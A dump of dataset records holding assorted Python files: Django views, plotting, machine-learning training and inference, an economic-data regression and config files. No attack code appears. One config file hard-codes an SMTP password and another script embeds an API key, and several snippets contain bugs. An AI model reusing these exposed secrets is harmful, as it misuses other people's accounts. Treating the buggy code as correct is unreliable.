url(r'^ajax/',include(\"pingtest.ajax_urls\")), \n url(r\"^$\",\"pingtest.views.pingtest_index\",),\n url(r\"^area/(?P\\d+)?/?\",\"pingtest.views.area_status\",),\n url(r\"^custom/(?P\\d+)?/?\",\"pingtest.views.custom_status\",),\n)\n","sub_path":"pingtest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"66259925","text":"children = []\nwith open(\"./relation.txt\") as f:\n\trelations = f.readlines()\n\tfor relation in relations:\n\t\tparts = relation.strip(\"\\n\").split(\":\")\n\t\tif parts[-2] == \"0\":\n\t\t\tchildren.append(parts[-1])\nnames = []\nname_id = dict()\nwith open(\"./name_id.txt\") as f:\n\tids = f.readlines()\n\tfor i in ids:\n\t\tname_id[i.strip(\"\\n\").split(\":\")[-1]] = i.split(\":\")[-2]\n\nfor i in children:\n\tnames.append(name_id[i])\n\nprint(names)\n","sub_path":"indexing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460798826","text":"#!/usr/bin/env python \r\nimport sys\r\nfrom PyQt5.QtWidgets import (QApplication,QHeaderView, QAbstractItemView, QTableView,\r\n QGroupBox, QHBoxLayout, QVBoxLayout, QWidget, QTableWidget)\r\n \r\n \r\nclass Page2Win(QWidget):\r\n def __init__(self, parent=None):\r\n #BOX\r\n mainLayout = QVBoxLayout()\r\n boxGroup = QGroupBox(\"发送历史信息\")\r\n super(Page2Win, self).__init__(parent)\r\n self.historyTv = QTableView(self)\r\n layout = QHBoxLayout()\r\n layout.addWidget(self.historyTv)\r\n boxGroup.setLayout(layout)\r\n mainLayout.addWidget(boxGroup)\r\n self.setLayout(mainLayout)\r\n \r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n win = Page2Win()\r\n win.show()\r\n sys.exit(app.exec_()) \r\n","sub_path":"Page2.py","file_name":"Page2.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415471573","text":"import matplotlib\nfrom matplotlib import pyplot\nfrom matplotlib.pyplot import plot\nfrom grabuberprice2 import start,end\n\n# Format must be [day,hour,minute,sec,year,month,day]\ndef map_time(data,get_original = False):\n time = []\n for i in data:\n i[2] = int(i[2]*1.6666)\n if len(str(i[2])) == 1:\n current_time = str(i[1])+'.0'+str(i[2])\n else:\n current_time = str(i[1]) + '.' + str(i[2])\n time.append(float(current_time))\n if get_original == False:\n return time\n elif get_original == True:\n return time,current\n\ndef plot_graph(x,y,day,*argv):\n pyplot.style.use('dark_background')\n matplotlib.rc('xtick', labelsize=20)\n matplotlib.rc('ytick', labelsize=20)\n matplotlib.rc('axes', labelsize=15)\n pyplot.figure(figsize=(12,6.5))\n matplotlib.rc('axes',titlesize=25)\n pyplot.title(\"Machine Learning \\n Uber Surge Price\",loc=\"left\")\n matplotlib.rc('axes',titlesize=15)\n pyplot.title(\"From {}\\nTo {}\".format(start,end),loc=\"right\")\n matplotlib.rc('axes',titlesize=25)\n week = [\"Monday\",\" Tuesday\", \"Wednesday\", \"Thursday\",\" Friday\", \"Saturday\",\"Sunday\"]\n pyplot.title(week[day])\n if argv:\n if len(argv) == 2:\n x2,y2=argv\n plot(x2,y2,color='grey',aa=True,label='Previous Week')\n elif len(argv) == 4:\n x2,y2,x3,y3 = argv\n plot(x2, y2, color='grey', aa=True, label='Previous Week')\n plot(x3, y3, color='yellow', aa=True,\n label='Currently',linewidth=3)\n else:\n pass\n plot(x, y, aa=True,color='cyan', label=\"Predicted\",\n linewidth=3,linestyle='dashed')\n pyplot.xlim(0,24)\n pyplot.xlabel('Hour of the day(hr)')\n pyplot.ylabel('USD ($)')\n pyplot.grid(True)\n pyplot.legend()\n pyplot.show()\n\n\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"60098754","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.views.generic.edit import CreateView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic import TemplateView\nfrom forum.models import Post\nfrom forum.forms import PostForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n\ndef index(request):\n return render(\n request,\n 'forum/forum.html',\n {\n 'title': 'home',\n }\n )\n\n# # CreatePost class not valid in urls\n# class CreatePost(CreateView):\n# model = Post\n# form_class = PostForm\n# template_name = 'forum/forum.html'\n\n# def create_post(request):\n# if form.is_valid():\n# form.save()\n# title = form.cleaned_data['title']\n# post_field = form.cleaned_data['post_field']\n \n# else:\n# return render(request, 'forum/forum.html', {'form': form})\n\n# class PostDetailView(DetailView):\n# model = Post\n# # slug_url_kwarg = 'slug'\n\n# def get_context_data(self, **kwargs):\n# context = super(PostDetailView, self).get_context_data(**kwargs)\n# slug = self.kwargs['slug']\n# return context\n\n# # def post(self,)\n\n\ndef post_detail(request, slug):\n template = 'forum/forum-post.html'\n # object_content = Post.objects.all()\n post = get_object_or_404(Post, slug=slug)\n context = {\n 'post': post,\n }\n return render(request, template, context)\n\n\n@login_required()\ndef create_post(request):\n form = PostForm()\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('home')\n else: \n return render(request, 'forum/forum.html', {'form': form})\n\n\n# class ForumDetail(TemplateView):\n# template_name = 'forum/forum-post.html'\n\n# def get(self, request):\n\n\n\n# def create_post(request):\n# form = PostForm(request.POST)\n# model = Post\n\n# if form.is_valid():\n# form.save()\n# # return render(request, 'forum/forum-post.html', {'post':post})\n# return post_detail(request, model.slug)\n# else:\n# return render(request, 'forum/forum.html', {'form': form})","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628313714","text":"class Solution:\n def findMaximumXOR(self, nums) -> int:\n ans = 0\n for i in range(31, -1, -1):\n # get the prefix\n nums_prefix = set([num >> i for num in nums])\n ans <<= 1 # 0 -> 00 1 ->10\n candidate = ans + 1 # 0->01 1->11\n for prefix in nums_prefix:\n if candidate ^ prefix in nums_prefix:\n ans = candidate\n break\n return ans\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.findMaximumXOR([3, 10, 5, 25, 2, 8]))\n","sub_path":"LeetCode30DaysChallenge-202009/Maximum XOR of Two Numbers in an Array.py","file_name":"Maximum XOR of Two Numbers in an Array.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161028607","text":"import os\r\ndef kav_log(sdk_path):\r\n os.chdir(sdk_path)\r\n kave_ini = open(\"kave.ini\", \"w\")\r\n kave_ini.write(\r\n \"[LOGGING]\\n\"\r\n \"WriteLog=10\\n\"\r\n \"WriteFileMonitorLog=10\\n\"\r\n \"WriteScanningProcessLog=10\\n\"\r\n \"Append=0\\n\"\r\n \"LogsFolder=.\\n\"\r\n )\r\ndef upd_log(updater_path):\r\n os.chdir(updater_path)\r\n updsdk_xml = open(\"updsdk.xml\",\"w\")\r\n updsdk_xml.write(\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n '\\n'\r\n )","sub_path":"logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"18920411","text":"\r\nCRAWL_NAME = \"MSN China monitor alarm\"\r\nINDEX_URL = \"https://www.msn.com/spartan/ntp?locale=zh-hk&market=hk&revip=hk\"\r\nTOP_URL = 500\r\nTIME_OUT = 5\r\nRETRY_COUNT = 3\r\nSCROLL_COUNT = 20\r\n\r\n\r\nMETRIC = {\r\n \"MSN_NAV\": {\r\n \"CRAWL_NAME\" : \"MSN China navigation monitor\",\r\n \"INDEX_URL\" : 'https://www.msn.cn/zh-cn',\r\n \"TIME_OUT\": 20,\r\n \"RETRY_COUNT\": 3,\r\n \"DATABASE\": {\r\n \"MONGODB_HOST\" : \"127.0.0.1\",\r\n \"MONGODB_PORT\" : 27017,\r\n \"MONGODB_DATABASE\" : \"monitor_msn\",\r\n \"MONGODB_POOL_SIZE\" : 100,\r\n \"DBNAME\": \"monitor_msn\",\r\n \"CRAWL_LOG_COLL\": \"crawl_log\"\r\n }\r\n }\r\n}\r\n\r\n\r\n\r\nMONGODB_HOST = \"127.0.0.1\"\r\nMONGODB_PORT = 27017\r\nMONGODB_DATABASE = \"monitor_msn\"\r\nMONGODB_POOL_SIZE = 100\r\n\r\nCRAWL_LOG_COLL = \"crawl_log\"\r\nSEND_MAIL_COLL = \"email_log\"\r\nMONITOR_COLL = \"monitor_log\"\r\nSTABILITY_COLL = \"stability_log\"\r\n\r\nMONITOR_API_URL = \"http://127.0.0.1:8000/api/monitor\"\r\nALERT_ITERVAL = 60 #minutes \r\n\r\n\r\nSEND_MAIL_URL = \"http://127.0.0.1:8001/api/sendmail\"\r\nMAIL_TO_LIST = \"v-beniu@microsoft.com\" #多个邮件;号分割。\r\nEMAIL_FROM_HOST = \"smtp.qq.com\"\r\nEMAIL_FROM_USER = \"594257094\"\r\nEMAIL_FROM_PASS = \"bimwvddblimbbeba\"\r\nEMAIL_POSTFIX = \"qq.com\"\r\n","sub_path":"monitor_probe/app/tasks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"290464767","text":"from cvm_net import cvm_net_I, cvm_net_II\nfrom input_data import InputData\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport cv2\n\n# -------------- configuration parameters -------------- #\n# the type of network to be used: \"CVM-NET-I\" or \"CVM-NET-II\"\nNETWORK_TYPE = 'CVM-NET-I'\n\nSATELLITE_IMAGE_PREFIX = '../Data/CVUSA/test_sat/'\nGROUND_IMAGE_PREFIX = '../Data/CVUSA/dubai2/ground'\nNUM_SAMPLES = 8\n# -------------------------------------------------------- #\n\nclass CVMInference:\n def __init__(self):\n self.sat_x = tf.placeholder(tf.float32, [None, 512, 512, 3], name='sat_x')\n self.grd_x = tf.placeholder(tf.float32, [None, 224, 1232, 3], name='grd_x')\n self.keep_prob = tf.placeholder(tf.float32)\n self.global_count = 0\n self.aerial_image_prefix = SATELLITE_IMAGE_PREFIX\n self.ground_image_prefix = GROUND_IMAGE_PREFIX\n self.num_imgs = NUM_SAMPLES\n\n # build model\n if NETWORK_TYPE == 'CVM-NET-I':\n self.sat_global, self.grd_global = cvm_net_I(self.sat_x, self.grd_x, self.keep_prob, False)\n elif NETWORK_TYPE == 'CVM-NET-II':\n self.sat_global, self.grd_global = cvm_net_II(self.sat_x, self.grd_x, self.keep_prob, False)\n else:\n print ('CONFIG ERROR: wrong network type, only CVM-NET-I and CVM-NET-II are valid')\n \n # run model\n print('CVMInference object created')\n self.config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)\n self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=None)\n \n with tf.Session(config=self.config) as sess:\n sess.run(tf.global_variables_initializer())\n print('loading model...')\n load_model_path = '../Model/' + NETWORK_TYPE + '/' + str(0) + '/model.ckpt'\n self.saver.restore(sess, load_model_path)\n print(\" Model loaded from: %s\" % load_model_path)\n print('load model...FINISHED')\n print('Test with black images')\n sat_zeros = np.zeros([1,512,512, 3])\n grd_zeros = np.zeros([1,224,1232, 3])\n feed_dict = {self.sat_x: sat_zeros, self.grd_x: grd_zeros, self.keep_prob: 1.0}\n sat_global_val, grd_global_val = sess.run([self.sat_global, self.grd_global], feed_dict=feed_dict)\n print('Test on black images passed')\n \n\n def load_images(self, is_ground = True, num_images = 5):\n if(is_ground):\n images = np.zeros([num_images, 224, 1232, 3], dtype = np.float32)\n for i in range(num_images):\n img = cv2.imread(self.ground_image_prefix + str(i) + '.jpg')\n img = cv2.resize(img, (1232, 224), interpolation=cv2.INTER_AREA)\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n else:\n images = np.zeros([num_images, 512, 512, 3], dtype=np.float32)\n for i in range(num_images):\n img = cv2.imread(SATELLITE_IMAGE_PREFIX + str(i) + '.jpg')\n img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA)\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n \n def next_images(self, is_ground = True, batch_size = 1):\n if(self.global_count >= self.num_imgs):\n return None\n else:\n if(is_ground):\n images = np.zeros([batch_size, 224, 1232, 3], dtype = np.float32)\n for i in range(batch_size):\n img = cv2.imread(self.ground_image_prefix + str(self.global_count) + '.jpg')\n img = cv2.resize(img, (1232, 224), interpolation=cv2.INTER_AREA)\n self.global_count += 1\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n else:\n images = np.zeros([batch_size, 512, 512, 3], dtype=np.float32)\n for i in range(batch_size):\n img = cv2.imread(self.aerial_image_prefix + str(self.global_count) + '.jpg')\n self.global_count += 1\n img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA)\n img = img.astype(np.float32)\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n images[i, :, :, :] = img\n return images\n \n \n \n \n def load_images_raw(self, is_ground = True, num_images = 5):\n if(is_ground):\n images = np.zeros([num_images, 224, 1232, 3], dtype = np.uint8)\n for i in range(num_images):\n #print(SATELLITE_IMAGE_PREFIX + str(i) + '.jpg')\n img = cv2.imread(self.ground_image_prefix + str(i) + '.jpg')\n img = cv2.resize(img, (1232, 224), interpolation=cv2.INTER_AREA)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n images[i, :, :, :] = img\n return images\n else:\n images = np.zeros([num_images, 512, 512, 3], dtype=np.uint8)\n for i in range(num_images):\n img = cv2.imread(self.aerial_image_prefix + str(i) + '.jpg')\n img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n images[i, :, :, :] = img\n return images\n \n \n def preprocess(self, images, is_ground):\n num_images = images.shape[0]\n images = images.astype(np.float32)\n for image in images:\n # img -= 100.0\n img[:, :, 0] -= 103.939 # Blue\n img[:, :, 1] -= 116.779 # Green\n img[:, :, 2] -= 123.6 # Red\n\n image[:, :, 0] -= 103.939 # Blue\n image[:, :, 1] -= 116.779 # Green\n image[:, :, 2] -= 123.6 # Red\n return images\n \n def forward(self, images, is_ground = True):\n with tf.Session(config=self.config) as sess:\n sess.run(tf.global_variables_initializer())\n load_model_path = '../Model/' + NETWORK_TYPE + '/' + str(0) + '/model.ckpt'\n self.saver.restore(sess, load_model_path)\n sat_zeros = np.zeros([1,512,512, 3])\n grd_zeros = np.zeros([1,224,1232, 3])\n # ---------------------- validation ----------------------\n print('computing global descriptors...')\n sat_zeros = np.zeros([images.shape[0],512,512, 3])\n grd_zeros = np.zeros([images.shape[0],224,1232, 3])\n \n if(is_ground):\n feed_dict = {self.sat_x: sat_zeros, self.grd_x: images, self.keep_prob: 1.0}\n else:\n feed_dict = {self.sat_x: images, self.grd_x: grd_zeros, self.keep_prob: 1.0}\n \n sat_global_val, grd_global_val = sess.run([self.sat_global, self.grd_global], feed_dict=feed_dict)\n\n if(is_ground):\n global_descriptor = grd_global_val\n else:\n global_descriptor = sat_global_val\n \n return global_descriptor\n","sub_path":"src/CVM-Net/cvm_inference.py","file_name":"cvm_inference.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344169950","text":"# Your code here\nignored_characters = ['\"', \":\", \";\", ',', '.', '-', '+', '=', '/', '\\\\', '|', '[', ']', '{', '}', '(', ')', '*', '^', '&']\n\ndef histogram():\n counts = dict()\n with open(\"applications/histo/robin.txt\") as f:\n words = f.read()\n split_words = words.split()\n \n for word in split_words:\n histo = \"\"\n for char in word:\n if char is not ignored_characters:\n histo += char\n word = histo.lower()\n\n if word in counts:\n counts[word] += 1\n elif word == \"\" or word == \" \":\n break\n else:\n counts[word] = 1\n\n items = list(counts.items())\n items.sort(key = lambda e: e[1], reverse = True)\n counts = (dict(items))\n for (string, value) in counts.items():\n print(f'{string} {\" \" * (20 - len(string))} {\"#\" * value}')\n\nprint(histogram())","sub_path":"applications/histo/histo.py","file_name":"histo.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406767249","text":"from collections import namedtuple\r\nimport collections\r\nfrom typing import Counter\r\n\r\nclass_employee=namedtuple('employee',['emp_id', 'emp_name','job_name','manager_id','salary', 'dep_id'])\r\nemployee1=class_employee(10024, 'Hadley_Sylvan', 'QA_Engineer', 9523, 1250, 4)\r\nemployee2=class_employee(10037, 'Marcie_Elodie', 'RnD_Engineer', 9012, 1500, 4)\r\nemployee3=class_employee(10164, 'Eileen_Candi', 'RnD_Engineer', 9012, 1500, 4) \r\nemployee4=class_employee(10021, 'Floretta_Ike', 'QA_Engineer', 9523, 750, 4)\r\nemployee5=class_employee(10094, 'Gideon_Talia', 'QA_Engineer', 9567, 500, 5)\r\n\r\nx=0\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n x+=employee[4]\r\n print(x)\r\n\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[4]>=1250:\r\n print (employee[1])\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[5]==4:\r\n print(employee[1], employee[2])\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[3]==9523:\r\n print(employee[1], employee[0])\r\n\r\n\r\n\r\nfor employee in (employee1, employee2, employee3, employee4, employee5):\r\n if employee[2]==(\"QA_Engineer\"):\r\n print (employee[0::])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Small Database/Yelena.Manukyan.py","file_name":"Yelena.Manukyan.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299285751","text":"# Importing Libraries and Frameworks\nimport tensorflow as tf\nimport time\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D, MaxPooling2D, Dense, Flatten, Dropout\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom tensorflow.python.client import device_lib\nimport matplotlib.pyplot as plt\n\n# Used to check whether CPU or GPU is used for training the model\ngpu_option = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction = 0.333)\nsess = tf.compat.v1.Session(config = tf.compat.v1.ConfigProto(gpu_options = gpu_option))\nprint(device_lib.list_local_devices())\n\n\n# Splitting Dataset into traning and testing\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# Reshaping data\nx_train = (x_train.astype(float)).reshape([-1, 28, 28, 1])\nx_test = (x_test.astype(float)).reshape([-1, 28, 28, 1])\n\n# Normalizing\nx_train /= 255\nx_test /= 255\n\n# Creating model\nmodel = Sequential()\n\nmodel.add(Convolution2D(filters = 20, kernel_size = (3, 3), input_shape = (28, 28, 1), activation = \"relu\"))\nmodel.add(MaxPooling2D(pool_size = (2, 2))) \nmodel.add(Flatten())\n\nmodel.add(Dense(activation = \"relu\", kernel_initializer = \"uniform\", input_dim = 28, units = 30))\n\nmodel.add(Dense(activation = \"relu\", kernel_initializer = \"uniform\", input_dim = 28, units = 30))\n\nmodel.add(Dropout(rate = 0.2))\n\nmodel.add(Dense(units = 10, kernel_initializer = \"uniform\", activation = \"sigmoid\"))\n\nmodel.compile(optimizer = \"adam\", loss = \"sparse_categorical_crossentropy\", metrics = [\"accuracy\"])\n\n# Adding tesorboard for optimizing and analyzing the model\ntensorboard = TensorBoard(log_dir=r\"D:\\Log\\{}\".format(time.time()))\n\n# Training the model\nmodel.fit(x_train, y_train, batch_size = 32, nb_epoch = 10, callbacks = [tensorboard])","sub_path":"mnist_cnn.py","file_name":"mnist_cnn.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58024608","text":"#import required packages\nimport requests\nimport json\nimport ast\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport statsmodels.formula.api as sm\n\n# request data from BEA for Gross Domestic Product in chained dollars\nurl = \"https://www.bea.gov/api/data/?&UserID=6B316ADE-8CA7-4651-B854-4984EB39687D&method=GetData&DataSetName=NIPA&TableName=T10106&Frequency=A&Year=ALL&ResultFormat=JSON&\"\nresponse3 = requests.get(url)\nddf1 = response3.text\nddf1\n\n#Gathering the data and defining as dataframe in Python\nddf2 = ast.literal_eval(ddf1)\nddf3 = ddf2['BEAAPI']['Results']['Data']\nddf4 = pd.DataFrame(ddf3)\n\n# Changing the years into float variable\nddf4.new_time = ddf4['TimePeriod'].astype(float)\n\n# Slicing the dataframe\nddf5 = ddf4[(ddf4.LineDescription == \"Gross domestic product\") & (ddf4.new_time > 1958)]\n\n# request data from BEA for Personal Consumption Expenditures in current dollars\nurl = \"https://www.bea.gov/api/data/?&UserID=6B316ADE-8CA7-4651-B854-4984EB39687D&method=GetData&DataSetName=NIUnderlyingDetail&TableName=U20305&Frequency=A&Year=ALL&ResultFormat=JSON&\"\nresponse1 = requests.get(url)\ndf1 = response1.text\ndf1\n\n#Gathering the data and defining as dataframe in Python\ndf2 = ast.literal_eval(df1)\ndf3 = df2['BEAAPI']['Results']['Data']\ndf4 = pd.DataFrame(df3)\n\n# Changing the years into float variable\ndf4.new_time = df4['TimePeriod'].astype(float)\n\n# Slicing the dataframe\ndf5 = df4[(df4.LineDescription == \"Personal consumption expenditures (PCE)\")]\n\n# Merging these two dataframes\nmerge1 = pd.merge(df5, ddf5, on='TimePeriod', how='left')\n\n# Changing the types of datavalues to floats by defining them without commas\nmerge1['DataValue_x'] = (merge1['DataValue_x'].str.split()).apply(lambda x: float(x[0].replace(',', '')))\nmerge1['DataValue_y'] = (merge1['DataValue_y'].str.split()).apply(lambda x: float(x[0].replace(',', '')))\n\n# request data from BEA for Fisher Index\nurl = \"https://www.bea.gov/api/data/?&UserID=6B316ADE-8CA7-4651-B854-4984EB39687D&method=GetData&DataSetName=NIPA&TableName=T10104&Frequency=A&Year=ALL&ResultFormat=JSON&\"\nresponse4 = requests.get(url)\ndfdf1 = response4.text\ndfdf1\n\n#Gathering the data and defining as dataframe in Python\ndfdf2 = ast.literal_eval(dfdf1)\ndfdf3 = dfdf2['BEAAPI']['Results']['Data']\ndfdf4 = pd.DataFrame(dfdf3)\n\n# Changing the years into float variable\ndfdf4.new_time = dfdf4['TimePeriod'].astype(float)\n\n# Slicing the dataframe\ndfdf5 = dfdf4[(dfdf4.METRIC_NAME == \"Fisher Price Index\") & (dfdf4.LineDescription == \"Gross domestic product\") & (dfdf4.new_time > 1958)]\n\n# Merging all dataframes\nmerge2 = pd.merge(merge1, dfdf5, on='TimePeriod', how='left')\n\n# Changing the types of datavalues to floats by defining them without dots\nmerge2['DataValue'] = (merge2['DataValue'].str.split()).apply(lambda x: float(x[0].replace('.', '')))\n\n# Changing the name of the variables and defining real personal consumption Expenditures\nmerge2['Real_PCE'] = (merge2['DataValue_x']/merge2['DataValue']) * 100000\nmerge2['Real_Income'] = merge2['DataValue_y']\n\n# Drawing the scatterplot between income and consumption\n# fit with np.polyfit\nm, b = np.polyfit(merge2['Real_Income'], merge2['Real_PCE'], 1)\n\nplt.plot(merge2['Real_Income'], merge2['Real_PCE'], '.')\nplt.plot(merge2['Real_Income'], m*merge2['Real_Income'] + b, '-')\nplt.ylabel('Consumption')\nplt.xlabel('Income')\nplt.title('Income and Consumption')\nplt.show()\n\n# Running the OLS regression of consumption on Income\nA = merge2['Real_Income'].values\nB = merge2['Real_PCE'].values\nresult = sm.ols(formula=\"B ~ A\", data=merge1).fit()\nresult.summary()\n\n# Saving the OLS regression as a pdf table\nf = open('myreg.tex', 'w')\nf.write(beginningtex)\nf.write(result.summary().as_latex())\nf.write(endtex)\nf.close()\n\n# Drawing the histogram of income \nsns.distplot(merge2['Real_Income'], kde=True, rug=False)\nplt.title('Distribution of Income')\nplt.show()\n","sub_path":"ProblemSets/ps7/PS7_Kirimhan.py","file_name":"PS7_Kirimhan.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406777767","text":"import tensorflow as tf\nimport cv2\nimport keras\nfrom keras.layers import Flatten\n\n\nimg = cv2.imread('baj.jpg',cv2.IMREAD_GRAYSCALE)\nimg2 = cv2.resize(img, (28,28))\nimg3 = 1- (img2.reshape((1,28*28))/255)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\nfashion_mnist = keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(optimizer=\"adam\",\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(train_images, train_labels, epochs=10)\nmodel.save(\"mymodel\")\n\nprint(\"-------------------------------------------------\")\nprint(img3)\nprint(\"-------------------------------------------------\")\nprint(model.predict(img3))\nprint(\"-------------------------------------------------\")\n\ntest_loss, test_acc = model.evaluate(test_images,test_labels,verbose=2)\nprint('\\nTest accuracy',test_acc)\n","sub_path":"day17/myfashion02getweb.py","file_name":"myfashion02getweb.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453703054","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom statsmodels.tsa.ar_model import AR \nimport tensorflow as tf\n\n\nclass myAR(object):\n def __init__(self):\n self.model = None\n self.scaler_load = None\n self.scaler_diff = None\n self.df = None\n self.batch_size = 32\n\n self.in_forecast = False\n self.in_training = False\n self.in_change = False\n\n def train(self, tsData, nb_epochs = 40, batchSize = 32):\n \"\"\"\n Trains the LSTM on the initial TimeSeries data. \n \n tsData can be pandas object with DateTimeIndex or a numpy array\n \"\"\"\n self.in_training = True\n if self.batch_size != batchSize:\n self.batch_size = batchSize\n \n # if self.model is not None:\n # print('Model is already trained')\n # return\n \n # TODO input validation\n temp_df = pd.DataFrame(tsData).copy()\n temp_df.columns = ['load']\n \n # Scale the input train data\n temp_scaler_load = StandardScaler()\n temp_df['scaledLoad'] = temp_scaler_load.fit_transform(temp_df[['load']])\n \n # Reshape the input to the desired form\n # df_train = self.df[['scaledLoad', 'scaledDiff', 'outVal']].dropna().values\n \n # Create AR Network\n temp_model = AR(temp_df.scaledLoad).fit()\n while self.in_forecast:\n print('Training is waiting for forecast finish to change the model')\n self.in_change = True\n self.model = temp_model\n self.scaler_load = temp_scaler_load\n self.df = temp_df\n self.in_change = False\n\n def addTsValue(self, newTsVal):\n \"\"\"\n Append new values to the existing load history\n \"\"\"\n newDf = newTsVal\n if not hasattr(type(newDf), '__iter__'): \n newDf = np.array([newDf])\n else:\n newDf = np.array(newDf)\n\n newDf = pd.DataFrame({'load': newDf})\n \n # newDf['diff'] = newDf.load.diff()\n # newDf['outVal'] = newDf.load.shift(-1)\n \n # newDf['scaledDiff'] = self.scaler_diff.transform(newDf[['diff']])\n newDf['scaledLoad'] = self.scaler_load.transform(newDf[['load']])\n # newDf['outVal'] = self.scaler_load.transform(newDf[['outVal']])\n \n # newDf = newDf.iloc[1:]\n \n self.df = pd.concat([self.df, newDf], sort=False).reset_index(drop=True)\n return newDf\n \n def makeTestPrediction(self, inputData):\n \"\"\"\n Evaluates all input test data, and returns them\n \"\"\"\n \n # add input data to dataframe:\n df_test = self.addTsValue(inputData)\n \n window = self.model.k_ar\n coef = self.model.params\n \n history = list(df_test.scaledLoad.values[-window:])\n predictions = list()\n \n for t in range(df_test.shape[0]):\n length = len(history)\n lag = [history[i] for i in range(length - window, length)]\n yhat = coef[0]\n for d in range(window):\n yhat += coef[d+1] * lag[ window - d - 1 ]\n obs = df_test.scaledLoad.values[t]\n \n predictions.append(float(yhat))\n history.append(float(obs))\n \n return df_test\n\n # make a one-step forecast\n def forecast(self):\n \"\"\"\n Makes a prediction based on the last element of the inner history of the model.\n \"\"\"\n while self.in_change:\n print('Forecast is waiting for model change')\n self.in_training = True\n window = self.model.k_ar\n coef = self.model.params\n \n history = list(self.df.scaledLoad.values[-window:]) \n length = len(history)\n \n lag = [history[i] for i 